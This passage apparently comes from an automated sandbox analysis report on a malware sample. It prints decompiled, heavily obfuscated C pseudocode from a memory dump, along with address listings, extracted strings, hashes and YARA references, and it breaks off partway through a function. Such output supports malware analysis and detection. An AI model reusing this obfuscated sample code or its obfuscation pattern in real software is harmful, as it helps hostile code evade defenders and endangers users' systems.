							_push(_t696);
							_push(1);
							_push(_t696);
							_push(_t696);
							_t713 = 8;
							_t789 = E00BC2CCF(_t713);
							_push( &_v288);
							_push(_v328);
							_push(_t789);
							_push(9);
							E00BC8601(_v412, _v444);
							_t793 = 0x375e34a;
							goto L10;
						}
						__eflags = _t793 - 0xeed25b2;
						if(_t793 != 0xeed25b2) {
							goto L31;
						}
						_push(0xbb1774);
						_t684 = E00BCC103(_v496, __eflags, _v504, _t691,  &_v256, _v340, E00BB54C0(_v512, _v348), _v300 - _t691);
						E00BC2EED(_v480, _v392, _v400, _t680);
						_t686 = _v304;
						_t695 = _t691 + _t684 - _t800;
						__eflags = _t695;
						 *_t686 = _t800;
						 *(_t686 + 4) = _t695;
						L23:
						return _v308;
						L31:
						__eflags = _t793 - 0x824eb52;
					} while (__eflags != 0);
					goto L23;
				}
			}

0x00bcd5fe
0x00bcd5fe
0x00bcd604
0x00bcd60c
0x00bcd617
0x00bcd61f
0x00bcd627
0x00bcd62f
0x00bcd637
0x00bcd642
0x00bcd64d
0x00bcd658
0x00bcd66e
0x00bcd675
0x00bcd67e
0x00bcd682
0x00bcd687
0x00bcd690
0x00bcd69b
0x00bcd6a6
0x00bcd6b1
0x00bcd6bc
0x00bcd6c7
0x00bcd6cf
0x00bcd6d7
0x00bcd6df
0x00bcd6e7
0x00bcd6ef
0x00bcd6fa
0x00bcd70a
0x00bcd70d
0x00bcd714
0x00bcd71f
0x00bcd72a
0x00bcd735
0x00bcd73d
0x00bcd748
0x00bcd753
0x00bcd75e
0x00bcd769
0x00bcd771
0x00bcd776
0x00bcd77e
0x00bcd786
0x00bcd78e
0x00bcd796
0x00bcd79e
0x00bcd7a6
0x00bcd7ae
0x00bcd7be
0x00bcd7c2
0x00bcd7c7
0x00bcd7cc
0x00bcd7d4
0x00bcd7e6
0x00bcd7e9
0x00bcd7f0
0x00bcd7fb
0x00bcd806
0x00bcd819
0x00bcd820
0x00bcd82b
0x00bcd836
0x00bcd841
0x00bcd84c
0x00bcd857
0x00bcd867
0x00bcd86c
0x00bcd872
0x00bcd87c
0x00bcd87f
0x00bcd883
0x00bcd88b
0x00bcd896
0x00bcd8a1
0x00bcd8ac
0x00bcd8b7
0x00bcd8cd
0x00bcd8d4
0x00bcd8dc
0x00bcd8e7
0x00bcd8ef
0x00bcd8f4
0x00bcd8fc
0x00bcd904
0x00bcd90c
0x00bcd914
0x00bcd91c
0x00bcd924
0x00bcd92c
0x00bcd937
0x00bcd93f
0x00bcd94a
0x00bcd955
0x00bcd960
0x00bcd96b
0x00bcd973
0x00bcd97b
0x00bcd983
0x00bcd98b
0x00bcd993
0x00bcd9a0
0x00bcd9a3
0x00bcd9a7
0x00bcd9af
0x00bcd9b7
0x00bcd9bf
0x00bcd9ca
0x00bcd9d2
0x00bcd9dd
0x00bcd9e5
0x00bcd9f5
0x00bcd9f9
0x00bcda01
0x00bcda09
0x00bcda14
0x00bcda1f
0x00bcda2a
0x00bcda32
0x00bcda3a
0x00bcda3f
0x00bcda47
0x00bcda52
0x00bcda5d
0x00bcda65
0x00bcda70
0x00bcda78
0x00bcda84
0x00bcda87
0x00bcda8d
0x00bcda92
0x00bcda9a
0x00bcdaa8
0x00bcdaad
0x00bcdab3
0x00bcdabb
0x00bcdac3
0x00bcdacb
0x00bcdad3
0x00bcdae0
0x00bcdae3
0x00bcdae7
0x00bcdaef
0x00bcdb05
0x00bcdb0c
0x00bcdb17
0x00bcdb22
0x00bcdb34
0x00bcdb39
0x00bcdb42
0x00bcdb4d
0x00bcdb55
0x00bcdb5e
0x00bcdb63
0x00bcdb6d
0x00bcdb70
0x00bcdb74
0x00bcdb7c
0x00bcdb89
0x00bcdb8d
0x00bcdb95
0x00bcdb9d
0x00bcdba8
0x00bcdbb0
0x00bcdbbb
0x00bcdbc6
0x00bcdbd1
0x00bcdbdc
0x00bcdbe7
0x00bcdbef
0x00bcdbf7
0x00bcdbfc
0x00bcdc04
0x00bcdc0f
0x00bcdc1a
0x00bcdc25
0x00bcdc2d
0x00bcdc35
0x00bcdc42
0x00bcdc46
0x00bcdc4e
0x00bcdc59
0x00bcdc64
0x00bcdc6f
0x00bcdc77
0x00bcdc7c
0x00bcdc81
0x00bcdc8b
0x00bcdc93
0x00bcdc9b
0x00bcdca3
0x00bcdca8
0x00bcdcb0
0x00bcdcb8
0x00bcdcbc
0x00bcdcc4
0x00bcdccc
0x00bcdcd7
0x00bcdce2
0x00bcdced
0x00bcdcf8
0x00bcdd03
0x00bcdd0e
0x00bcdd16
0x00bcdd1b
0x00bcdd26
0x00bcdd2b
0x00bcdd2f
0x00bcdd37
0x00bcdd42
0x00bcdd4a
0x00bcdd55
0x00bcdd63
0x00bcdd68
0x00bcdd6c
0x00bcdd74
0x00bcdd7c
0x00bcdd84
0x00bcdd8f
0x00bcdd9a
0x00bcdda5
0x00bcddb0
0x00bcddc4
0x00bcddc9
0x00bcddd0
0x00bcdddb
0x00bcdde3
0x00bcddeb
0x00bcddf3
0x00bcddf8
0x00bcde00
0x00bcde10
0x00bcde16
0x00bcde1b
0x00bcde20
0x00bcde28
0x00bcde3a
0x00bcde3d
0x00bcde44
0x00bcde4f
0x00bcde57
0x00bcde5f
0x00bcde67
0x00bcde6f
0x00bcde7a
0x00bcde85
0x00bcde8d
0x00bcde98
0x00bcdea3
0x00bcdeae
0x00bcdeb6
0x00bcdec1
0x00bcdecc
0x00bcded7
0x00bcdee2
0x00bcdeed
0x00bcdef8
0x00bcdf03
0x00bcdf15
0x00bcdf1c
0x00bcdf23
0x00bcdf36
0x00bcdf45
0x00bcdf4c
0x00bcdf57
0x00bcdf62
0x00bcdf6d
0x00bcdf78
0x00bcdf78
0x00bcdf7d
0x00bcdf7d
0x00bcdf7d
0x00bcdf7d
0x00bcdf83
0x00000000
0x00000000
0x00bcdf89
0x00bce0e9
0x00bce0f4
0x00bce0f5
0x00bce0fa
0x00bce102
0x00bce104
0x00bce1d1
0x00bce1d1
0x00bce10a
0x00bce013
0x00bce013
0x00bcdf78
0x00bcdf78
0x00000000
0x00bcdf78
0x00bcdf78
0x00bcdf95
0x00bce08a
0x00bce08f
0x00bce0a3
0x00bce0a4
0x00bce0a5
0x00bce0a6
0x00bce0b8
0x00bce0d0
0x00bce0d5
0x00bce0d8
0x00000000
0x00bce0d8
0x00bcdfa1
0x00bce38a
0x00000000
0x00bce392
0x00bcdfad
0x00bce054
0x00bce061
0x00bce067
0x00bce06e
0x00bce070
0x00bce076
0x00bce07a
0x00000000
0x00bce07a
0x00bcdfb9
0x00bce03b
0x00bce040
0x00bce044
0x00bce047
0x00bce04c
0x00000000
0x00bce04c
0x00bcdfc1
0x00000000
0x00000000
0x00bcdfda
0x00bcdfdb
0x00bcdfdd
0x00bcdfde
0x00bcdfe1
0x00bcdfe7
0x00bcdff0
0x00bcdff1
0x00bce003
0x00bce004
0x00bce006
0x00bce00b
0x00bce010
0x00bce010
0x00000000
0x00bce010
0x00bce114
0x00bce11a
0x00bce2bb
0x00bce2d1
0x00bce2d2
0x00bce2d4
0x00bce2d5
0x00bce2d6
0x00bce2d8
0x00bce2de
0x00bce2e0
0x00bce2e3
0x00bce2ea
0x00bce2ec
0x00bce2ee
0x00bce2f0
0x00bce2f9
0x00bce2f9
0x00bce2fb
0x00bce2fd
0x00bce2ff
0x00bce302
0x00bce302
0x00bce302
0x00bce31b
0x00bce31c
0x00bce31e
0x00bce31f
0x00bce322
0x00bce323
0x00bce328
0x00bce329
0x00bce334
0x00bce33d
0x00bce33e
0x00bce340
0x00bce345
0x00bce349
0x00bce34c
0x00bce351
0x00000000
0x00bce351
0x00bce120
0x00bce126
0x00bce2ad
0x00000000
0x00bce2ad
0x00bce12c
0x00bce12e
0x00bce23a
0x00bce23f
0x00bce298
0x00bce29b
0x00bce2a0
0x00bce2a3
0x00000000
0x00bce2a3
0x00bce134
0x00bce13a
0x00bce1eb
0x00bce1ec
0x00bce1ee
0x00bce1ef
0x00bce1f2
0x00bce1f8
0x00bce201
0x00bce202
0x00bce217
0x00bce218
0x00bce21a
0x00bce21f
0x00000000
0x00bce21f
0x00bce140
0x00bce146
0x00000000
0x00000000
0x00bce157
0x00bce18d
0x00bce1aa
0x00bce1af
0x00bce1b9
0x00bce1b9
0x00bce1bb
0x00bce1bd
0x00bce1c0
0x00000000
0x00bce356
0x00bce356
0x00bce356
0x00000000
0x00bce362

Strings

w], xrefs: 00BCDF57
qu, xrefs: 00BCDABB
EI, xrefs: 00BCD642
rlg, xrefs: 00BCD857
D.I, xrefs: 00BCDCE2
e_, xrefs: 00BCDD84
W9X, xrefs: 00BCD7A6
qeV, xrefs: 00BCDA47

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: D.I$EI$W9X$qeV$qu$rlg$w]$e_
API String ID: 0-1297867753
Opcode ID: cd0af40f3881cb0fe2e8bed5660b5f721cd19e4a082eda18760cf36f0c6e7d58
Instruction ID: e796cb693f6d3a5bda2a17605a6e035667254895360d43785d59bb0310614073
Opcode Fuzzy Hash: cd0af40f3881cb0fe2e8bed5660b5f721cd19e4a082eda18760cf36f0c6e7d58
Instruction Fuzzy Hash: 806200715083809BE378CF25C48AB9BBBE1FBC5318F10891DE5D99A260D7B49949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00BBE6FD, Relevance: 10.4, Strings: 8, Instructions: 363
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00BBE6FD(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				short _v2604;
				short _v2608;
				intOrPtr _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				void* _t446;
				signed int _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				void* _t508;
				void* _t509;
				signed int* _t513;

				_t513 =  &_v2784;
				_v2612 = 0xb14832;
				_v2608 = 0;
				_v2604 = 0;
				_v2620 = 0xe8d9a4;
				_v2620 = _v2620 >> 0xa;
				_v2620 = _v2620 ^ 0x00003a1f;
				_v2716 = 0x661746;
				_v2716 = _v2716 >> 0xd;
				_v2716 = _v2716 + 0xb248;
				_v2716 = _v2716 ^ 0x000ec2b2;
				_v2644 = 0xdee13e;
				_t508 = __ecx;
				_t509 = 0xe9a37bd;
				_t459 = 0x73;
				_v2644 = _v2644 / _t459;
				_v2644 = _v2644 ^ 0x00087c3f;
				_v2684 = 0x42fa90;
				_v2684 = _v2684 ^ 0x6576c337;
				_t460 = 0x77;
				_v2684 = _v2684 / _t460;
				_v2684 = _v2684 ^ 0x00ded541;
				_v2780 = 0xdee3be;
				_v2780 = _v2780 + 0xc63c;
				_v2780 = _v2780 | 0x49613a4b;
				_t41 =  &_v2780; // 0x49613a4b
				_t461 = 0x52;
				_v2780 =  *_t41 / _t461;
				_v2780 = _v2780 ^ 0x00e29cb0;
				_v2656 = 0x7f0271;
				_v2656 = _v2656 >> 5;
				_v2656 = _v2656 | 0x6739ae8c;
				_v2656 = _v2656 ^ 0x673f06e1;
				_v2708 = 0xd3cd2a;
				_v2708 = _v2708 >> 5;
				_v2708 = _v2708 * 0xa;
				_v2708 = _v2708 ^ 0x004d5de0;
				_v2636 = 0x219fe1;
				_v2636 = _v2636 + 0xffff1923;
				_v2636 = _v2636 ^ 0x002c04bb;
				_v2664 = 0xd7b86a;
				_v2664 = _v2664 + 0x1915;
				_v2664 = _v2664 | 0xe7c86f51;
				_v2664 = _v2664 ^ 0xe7d3f078;
				_v2648 = 0x20b83f;
				_v2648 = _v2648 ^ 0x4b4e1051;
				_v2648 = _v2648 | 0xdeede880;
				_v2648 = _v2648 ^ 0xdfea2d3b;
				_v2700 = 0x47fefa;
				_v2700 = _v2700 + 0x9822;
				_v2700 = _v2700 | 0x6193a96f;
				_v2700 = _v2700 ^ 0x61d2a9f9;
				_v2772 = 0xd92f77;
				_v2772 = _v2772 ^ 0xa467ab56;
				_v2772 = _v2772 + 0xffff4ece;
				_v2772 = _v2772 ^ 0xaefcfb78;
				_v2772 = _v2772 ^ 0x0a4c9451;
				_v2740 = 0x679e3a;
				_v2740 = _v2740 * 0x2c;
				_v2740 = _v2740 | 0x78cf8b4f;
				_v2740 = _v2740 ^ 0x79c282dc;
				_v2668 = 0xb39db0;
				_v2668 = _v2668 + 0xeb5f;
				_v2668 = _v2668 << 0x10;
				_v2668 = _v2668 ^ 0x89013146;
				_v2748 = 0xe9dfd5;
				_v2748 = _v2748 ^ 0x11776e38;
				_t462 = 3;
				_v2748 = _v2748 / _t462;
				_v2748 = _v2748 ^ 0x9b0fc96d;
				_v2748 = _v2748 ^ 0x9ed43a4a;
				_v2692 = 0x87a328;
				_v2692 = _v2692 ^ 0xe1c8826f;
				_t463 = 0x23;
				_v2692 = _v2692 / _t463;
				_v2692 = _v2692 ^ 0x066db35c;
				_v2616 = 0xb26be6;
				_t464 = 0x31;
				_v2616 = _v2616 * 0x4f;
				_v2616 = _v2616 ^ 0x3703c283;
				_v2732 = 0xfa73da;
				_v2732 = _v2732 / _t464;
				_v2732 = _v2732 ^ 0xe919612e;
				_v2732 = _v2732 ^ 0xa13aec5f;
				_v2732 = _v2732 ^ 0x4829c6cd;
				_v2764 = 0x1ce576;
				_v2764 = _v2764 + 0x80d7;
				_v2764 = _v2764 | 0x5654564f;
				_v2764 = _v2764 << 4;
				_v2764 = _v2764 ^ 0x65d93fe8;
				_v2724 = 0xc8b6c2;
				_v2724 = _v2724 >> 3;
				_v2724 = _v2724 | 0x2636b9dc;
				_v2724 = _v2724 ^ 0x263db6ae;
				_v2676 = 0x2ab0a9;
				_v2676 = _v2676 | 0x6e4fef29;
				_t173 =  &_v2676; // 0x6e4fef29
				_t465 = 0x3a;
				_v2676 =  *_t173 / _t465;
				_v2676 = _v2676 ^ 0x01e03b45;
				_v2784 = 0xf81aa2;
				_v2784 = _v2784 * 0x37;
				_v2784 = _v2784 >> 6;
				_v2784 = _v2784 | 0x88521995;
				_v2784 = _v2784 ^ 0x88ddfed1;
				_v2756 = 0x3eb734;
				_v2756 = _v2756 + 0x7a78;
				_v2756 = _v2756 << 0xb;
				_v2756 = _v2756 << 6;
				_v2756 = _v2756 ^ 0x635a6d7d;
				_v2652 = 0xa6fb32;
				_v2652 = _v2652 + 0x158;
				_v2652 = _v2652 + 0x8a86;
				_v2652 = _v2652 ^ 0x00aa8385;
				_v2688 = 0xc483ce;
				_v2688 = _v2688 >> 0xe;
				_v2688 = _v2688 + 0xffff535e;
				_v2688 = _v2688 ^ 0xfff294f5;
				_v2628 = 0x200f2a;
				_v2628 = _v2628 | 0xf96dc0c7;
				_v2628 = _v2628 ^ 0xf96acaa0;
				_v2776 = 0xfb6c51;
				_v2776 = _v2776 + 0x858e;
				_v2776 = _v2776 << 0x10;
				_v2776 = _v2776 | 0xa8cdae9b;
				_v2776 = _v2776 ^ 0xf9da7ea8;
				_v2696 = 0x83e06f;
				_v2696 = _v2696 + 0x79c4;
				_v2696 = _v2696 << 3;
				_v2696 = _v2696 ^ 0x0428a28b;
				_v2660 = 0x8d6379;
				_v2660 = _v2660 << 3;
				_v2660 = _v2660 | 0x96c90954;
				_v2660 = _v2660 ^ 0x96e4f501;
				_v2768 = 0xc871cd;
				_t466 = 0x4d;
				_v2768 = _v2768 / _t466;
				_t467 = 0xb;
				_v2768 = _v2768 / _t467;
				_v2768 = _v2768 << 0xb;
				_v2768 = _v2768 ^ 0x01e84caf;
				_v2680 = 0x5b63c1;
				_t468 = 0x43;
				_v2680 = _v2680 * 0x58;
				_v2680 = _v2680 ^ 0x3ad683cd;
				_v2680 = _v2680 ^ 0x25bdd966;
				_v2632 = 0xe96733;
				_v2632 = _v2632 ^ 0x28d2de6f;
				_v2632 = _v2632 ^ 0x283eec54;
				_v2672 = 0xb51720;
				_v2672 = _v2672 >> 1;
				_v2672 = _v2672 ^ 0xf8a43ee6;
				_v2672 = _v2672 ^ 0xf8fd7c74;
				_v2752 = 0x5fb294;
				_v2752 = _v2752 + 0x84c9;
				_v2752 = _v2752 | 0x544bb179;
				_v2752 = _v2752 + 0x71f6;
				_v2752 = _v2752 ^ 0x546b6180;
				_v2760 = 0xc7cca7;
				_v2760 = _v2760 + 0xffffdf6c;
				_v2760 = _v2760 >> 3;
				_v2760 = _v2760 + 0x8f65;
				_v2760 = _v2760 ^ 0x0015eae0;
				_v2624 = 0x5977d2;
				_v2624 = _v2624 << 0xd;
				_v2624 = _v2624 ^ 0x2ef344d0;
				_v2744 = 0x60a2ed;
				_v2744 = _v2744 * 0x5f;
				_v2744 = _v2744 + 0xffff748a;
				_v2744 = _v2744 | 0x618e1a1f;
				_v2744 = _v2744 ^ 0x63de2e0e;
				_v2720 = 0x52b24c;
				_v2720 = _v2720 << 0xd;
				_v2720 = _v2720 / _t468;
				_v2720 = _v2720 ^ 0x0142e01f;
				_v2728 = 0x837310;
				_v2728 = _v2728 + 0xffff3b1b;
				_v2728 = _v2728 << 8;
				_v2728 = _v2728 + 0xf69d;
				_v2728 = _v2728 ^ 0x82a372fc;
				_v2704 = 0xcb4037;
				_v2704 = _v2704 ^ 0x9097fcc9;
				_v2704 = _v2704 << 3;
				_v2704 = _v2704 ^ 0x82e67b61;
				_v2640 = 0xcfd6f1;
				_v2640 = _v2640 << 2;
				_v2640 = _v2640 ^ 0x03357271;
				_v2712 = 0x3a432c;
				_v2712 = _v2712 << 2;
				_v2712 = _v2712 | 0x39ad3967;
				_v2712 = _v2712 ^ 0x39e51942;
				_v2736 = 0xb6894f;
				_v2736 = _v2736 << 6;
				_v2736 = _v2736 + 0xffff1d29;
				_v2736 = _v2736 + 0xffffc406;
				_v2736 = _v2736 ^ 0x2da3cdd8;
				do {
					while(_t509 != 0x7d63619) {
						if(_t509 == 0xd6a7cf6) {
							E00BB24AA(_t468, _v2716, __eflags,  &_v2600, _v2644, _v2684, _v2780);
							 *((short*)(E00BC0F17(_v2656, _v2708,  &_v2600, _v2636, _v2664))) = 0;
							E00BCCC3F(_v2648,  &_v1560, __eflags, _v2700);
							_push(0xbb11b0);
							E00BD06A6(__eflags,  &_v2600, _v2668, E00BD0AD3(_v2772, _v2740, __eflags), _v2748, _v2692,  &_v2080, _v2616);
							E00BC2EED(_v2732, _v2764, _v2724, _t452);
							_t468 =  &_v2080;
							_t446 = E00BD3306(_t468, _v2676, _v2784, _v2756, _t508, _v2652);
							_t513 =  &(_t513[0x16]);
							__eflags = _t446;
							if(__eflags != 0) {
								_t509 = 0x7d63619;
								continue;
							}
						} else {
							if(_t509 != 0xe9a37bd) {
								goto L8;
							} else {
								_t509 = 0xd6a7cf6;
								continue;
							}
						}
						goto L9;
					}
					_push(_t468);
					E00BBE259(_v2688, _v2620, _v2628, _v2776, _t468, _t468,  &_v1040, _v2696, _v2660);
					_push(0xbb1260);
					E00BD06A6(__eflags,  &_v1040, _v2632, E00BD0AD3(_v2768, _v2680, __eflags), _v2672, _v2752,  &_v520, _v2760);
					_t468 = _v2624;
					E00BC2EED(_t468, _v2744, _v2720, _t440);
					_push(_v2736);
					_push( &_v520);
					_push(0);
					_push(_v2712);
					_push(_v2640);
					_push(_v2704);
					_push(0);
					_push(0);
					_t446 = E00BD06EF(_v2728, __eflags);
					_t513 =  &(_t513[0x1a]);
					_t509 = 0x5b6dba;
					L8:
					__eflags = _t509 - 0x5b6dba;
				} while (__eflags != 0);
				L9:
				return _t446;
			}

0x00bbe6fd
0x00bbe703
0x00bbe713
0x00bbe71a
0x00bbe721
0x00bbe72c
0x00bbe734
0x00bbe73f
0x00bbe747
0x00bbe74c
0x00bbe754
0x00bbe75c
0x00bbe773
0x00bbe775
0x00bbe77a
0x00bbe77f
0x00bbe788
0x00bbe793
0x00bbe79b
0x00bbe7a7
0x00bbe7ac
0x00bbe7b2
0x00bbe7ba
0x00bbe7c2
0x00bbe7ca
0x00bbe7d2
0x00bbe7d6
0x00bbe7d9
0x00bbe7dd
0x00bbe7e5
0x00bbe7f0
0x00bbe7f8
0x00bbe803
0x00bbe80e
0x00bbe816
0x00bbe820
0x00bbe824
0x00bbe82c
0x00bbe837
0x00bbe842
0x00bbe84d
0x00bbe858
0x00bbe863
0x00bbe86e
0x00bbe879
0x00bbe884
0x00bbe88f
0x00bbe89a
0x00bbe8a5
0x00bbe8ad
0x00bbe8b5
0x00bbe8bd
0x00bbe8c5
0x00bbe8cd
0x00bbe8d5
0x00bbe8dd
0x00bbe8e5
0x00bbe8ed
0x00bbe8fa
0x00bbe8fe
0x00bbe906
0x00bbe90e
0x00bbe919
0x00bbe924
0x00bbe92c
0x00bbe939
0x00bbe941
0x00bbe94f
0x00bbe954
0x00bbe95a
0x00bbe962
0x00bbe96a
0x00bbe972
0x00bbe97e
0x00bbe983
0x00bbe989
0x00bbe991
0x00bbe9a4
0x00bbe9a7
0x00bbe9ae
0x00bbe9b9
0x00bbe9c9
0x00bbe9cd
0x00bbe9d5
0x00bbe9dd
0x00bbe9e5
0x00bbe9ed
0x00bbe9f5
0x00bbe9fd
0x00bbea02
0x00bbea0a
0x00bbea12
0x00bbea17
0x00bbea1f
0x00bbea27
0x00bbea32
0x00bbea3d
0x00bbea44
0x00bbea47
0x00bbea4b
0x00bbea53
0x00bbea60
0x00bbea64
0x00bbea69
0x00bbea71
0x00bbea79
0x00bbea81
0x00bbea89
0x00bbea8e
0x00bbea93
0x00bbea9b
0x00bbeaa6
0x00bbeab1
0x00bbeabc
0x00bbeac7
0x00bbeacf
0x00bbead4
0x00bbeadc
0x00bbeae4
0x00bbeaef
0x00bbeafa
0x00bbeb05
0x00bbeb0d
0x00bbeb15
0x00bbeb1a
0x00bbeb22
0x00bbeb2a
0x00bbeb32
0x00bbeb3a
0x00bbeb41
0x00bbeb49
0x00bbeb54
0x00bbeb5c
0x00bbeb67
0x00bbeb72
0x00bbeb80
0x00bbeb85
0x00bbeb8f
0x00bbeb94
0x00bbeb9a
0x00bbeb9f
0x00bbeba7
0x00bbebb4
0x00bbebb5
0x00bbebb9
0x00bbebc1
0x00bbebc9
0x00bbebd4
0x00bbebdf
0x00bbebea
0x00bbebf5
0x00bbebfc
0x00bbec07
0x00bbec12
0x00bbec1a
0x00bbec22
0x00bbec2a
0x00bbec32
0x00bbec3a
0x00bbec42
0x00bbec4a
0x00bbec4f
0x00bbec57
0x00bbec5f
0x00bbec6a
0x00bbec72
0x00bbec7d
0x00bbec8a
0x00bbec8e
0x00bbec96
0x00bbec9e
0x00bbeca6
0x00bbecae
0x00bbecb9
0x00bbecbd
0x00bbecc5
0x00bbeccd
0x00bbecd5
0x00bbecda
0x00bbece2
0x00bbecea
0x00bbecf2
0x00bbecfa
0x00bbecff
0x00bbed07
0x00bbed12
0x00bbed1a
0x00bbed25
0x00bbed2d
0x00bbed32
0x00bbed3a
0x00bbed42
0x00bbed4a
0x00bbed4f
0x00bbed57
0x00bbed5f
0x00bbed6c
0x00bbed6c
0x00bbed7a
0x00bbedaa
0x00bbede5
0x00bbedef
0x00bbedfc
0x00bbee39
0x00bbee4e
0x00bbee5a
0x00bbee71
0x00bbee76
0x00bbee79
0x00bbee7b
0x00bbee81
0x00000000
0x00bbee81
0x00bbed7c
0x00bbed82
0x00000000
0x00bbed88
0x00bbed88
0x00000000
0x00bbed88
0x00bbed82
0x00000000
0x00bbed7a
0x00bbee88
0x00bbeeb7
0x00bbeec7
0x00bbef01
0x00bbef12
0x00bbef19
0x00bbef1e
0x00bbef29
0x00bbef2a
0x00bbef2b
0x00bbef2f
0x00bbef36
0x00bbef3e
0x00bbef3f
0x00bbef40
0x00bbef45
0x00bbef48
0x00bbef4d
0x00bbef4d
0x00bbef4d
0x00bbef63
0x00bbef63

Strings

)On, xrefs: 00BBEA3D
OVTV, xrefs: 00BBE9F5
K:aI, xrefs: 00BBE7D2
_, xrefs: 00BBE919
,C:, xrefs: 00BBED25
T>(, xrefs: 00BBEBDF
]M, xrefs: 00BBE824
}mZc, xrefs: 00BBEA93

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: )On$,C:$K:aI$OVTV$T>($_$}mZc$]M
API String ID: 0-4112715058
Opcode ID: 3481b85456a6a5900fdcb63f3fcb875543b3693180651eb3cdb4b6e167b964b2
Instruction ID: 6dee88c86b4549da477f846a6c2618dd965171dd5368933f4c352e511805ad7d
Opcode Fuzzy Hash: 3481b85456a6a5900fdcb63f3fcb875543b3693180651eb3cdb4b6e167b964b2
Instruction Fuzzy Hash: 6812E0725083819FD3A8CF65C48AA9BFBE1FBC5348F10891DE1DA96260D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4716, Relevance: 10.4, Strings: 8, Instructions: 354
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00BB4716(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				void* _t435;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				void* _t496;
				void* _t497;
				signed int* _t501;

				_t501 =  &_v2772;
				_v2756 = 0xbd3805;
				_t496 = __ecx;
				_t497 = 0xe9a37bd;
				_t449 = 0x67;
				_v2756 = _v2756 / _t449;
				_v2756 = _v2756 | 0x3bad178a;
				_v2756 = _v2756 >> 0xb;
				_v2756 = _v2756 ^ 0x00077593;
				_v2708 = 0x78b1a9;
				_v2708 = _v2708 ^ 0xbce39c92;
				_t450 = 0x7a;
				_v2708 = _v2708 * 0x68;
				_v2708 = _v2708 ^ 0x9f06045c;
				_v2768 = 0xcb3435;
				_v2768 = _v2768 + 0xf139;
				_v2768 = _v2768 + 0x4a95;
				_v2768 = _v2768 ^ 0x45397ef6;
				_v2768 = _v2768 ^ 0x45f6dc85;
				_v2656 = 0xb5bc8b;
				_v2656 = _v2656 / _t450;
				_v2656 = _v2656 >> 9;
				_v2656 = _v2656 ^ 0x000644df;
				_v2676 = 0x9a59a2;
				_v2676 = _v2676 << 6;
				_v2676 = _v2676 + 0x79c9;
				_v2676 = _v2676 ^ 0x269927bc;
				_v2644 = 0xebdb0b;
				_v2644 = _v2644 + 0xffff7e91;
				_v2644 = _v2644 ^ 0x00e3e818;
				_v2744 = 0x748cb6;
				_t451 = 0x69;
				_v2744 = _v2744 / _t451;
				_v2744 = _v2744 + 0xffff7480;
				_v2744 = _v2744 >> 4;
				_v2744 = _v2744 ^ 0x000f716d;
				_v2700 = 0x5a3d3a;
				_v2700 = _v2700 << 2;
				_v2700 = _v2700 + 0xffff4e8e;
				_v2700 = _v2700 ^ 0x0160ac4c;
				_v2648 = 0x7e8104;
				_t452 = 0x52;
				_v2648 = _v2648 / _t452;
				_v2648 = _v2648 >> 0xf;
				_v2648 = _v2648 ^ 0x0000f20f;
				_v2660 = 0x9d9081;
				_v2660 = _v2660 + 0xe267;
				_t446 = 0x6d;
				_v2660 = _v2660 / _t446;
				_v2660 = _v2660 ^ 0x000198c4;
				_v2760 = 0x1fdf7e;
				_v2760 = _v2760 + 0xffffb57e;
				_v2760 = _v2760 | 0x4d8d3104;
				_v2760 = _v2760 * 0x1f;
				_v2760 = _v2760 ^ 0x6651034b;
				_v2616 = 0x1e8142;
				_v2616 = _v2616 ^ 0x9846525f;
				_v2616 = _v2616 ^ 0x985a7e6a;
				_v2636 = 0x8bea9d;
				_v2636 = _v2636 + 0x3433;
				_v2636 = _v2636 ^ 0x008c5316;
				_v2692 = 0x8d3fa0;
				_v2692 = _v2692 + 0xa16;
				_v2692 = _v2692 ^ 0x3978a715;
				_v2692 = _v2692 ^ 0x39fca316;
				_v2752 = 0x54e5a5;
				_t453 = 0x31;
				_v2752 = _v2752 / _t453;
				_v2752 = _v2752 << 2;
				_v2752 = _v2752 << 0xd;
				_v2752 = _v2752 ^ 0xddc01927;
